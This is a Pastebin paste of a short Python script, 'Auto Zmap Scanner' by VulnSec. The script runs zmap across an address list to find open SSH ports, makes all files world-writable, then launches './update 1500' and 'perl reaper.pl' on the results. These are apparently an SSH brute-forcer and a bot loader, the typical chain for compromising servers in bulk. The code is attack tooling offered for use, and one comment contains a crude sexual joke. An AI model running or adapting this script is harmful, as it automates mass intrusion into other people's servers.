Advertisement
VulnSec

AUTO ZMAP SCANNER

Sep 5th, 2018
247
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.56 KB | None | 0 0
  1. import subprocess,os,sys,random,time,urllib2,subprocess
  2. #!/usr/bin/env python
  3.  
  4. #Auto Zmap Scanner By VulnSec
  5. #USAGE:python zmap.py
  6. #What this script does is automatically load zmap so your lazy ass can beat your dick to hentai xD
  7.  
  8. def run(cmd):
  9. subprocess.call(cmd, shell=True)
  10.  
  11. print("ZMAP AUTO SCANNER STARTED MAKE SURE YOU CHANGED LIST NAME !")
  12. time.sleep(5)
  13. print("Sleeping For 5 Seconds")
  14. run("zmap -p22 -w as.lst -o mfu.txt")
  15. time.sleep(10)
  16. run("chmod 777 *")
  17. time.sleep(2)
  18. run("./update 1500")
  19. time.sleep(2)
  20. run("perl reaper.pl vuln.txt")
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement